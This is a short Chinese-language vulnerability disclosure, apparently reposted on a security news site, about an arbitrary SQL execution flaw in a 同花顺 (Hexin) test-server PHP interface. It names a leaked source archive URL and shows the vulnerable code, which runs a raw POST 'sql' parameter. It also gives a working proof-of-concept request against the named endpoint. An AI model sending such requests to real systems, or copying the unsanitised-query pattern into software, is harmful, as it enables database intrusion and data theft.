频道栏目
首页 > 安全 > 网络安全 > 正文
同花顺某接口任意SQL执行漏洞
2016-06-07 09:05:43           
收藏   我要投稿

同花顺某接口任意SQL执行漏洞

敏感文件泄露导致漏洞溅射
https://test.hexin.cn/htdocs.tgz
https://test.hexin.cn/htdocs/eq/eqadmin/interface/wxloginprompt.php
源码
 

<?php
include_once ("mysql_query.php");
include_once ("array_iconv.php");
include_once ("arraytoxml_function.php");
$action = $_POST ['op'];
if ($action == "insert") {
        $sql = stripslashes ( $_POST ['sql'] );
        $return = mysql_query ( $sql );
        print_r ( $return );

任意SQL执行

POST
https://test.hexin.cn/htdocs/eq/eqadmin/interface/wxloginprompt.php
op=insert&sql=select version()

ths1.png

解决方案:

删除

点击复制链接 与好友分享!回本站首页
相关TAG标签 同花 漏洞 接口
上一篇:JEECMS XssFilter缺陷导致的存储型XSS漏洞
下一篇:某大型第三方支付机构商务终端TPM系统用户体制不严涉及大量敏感信息
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站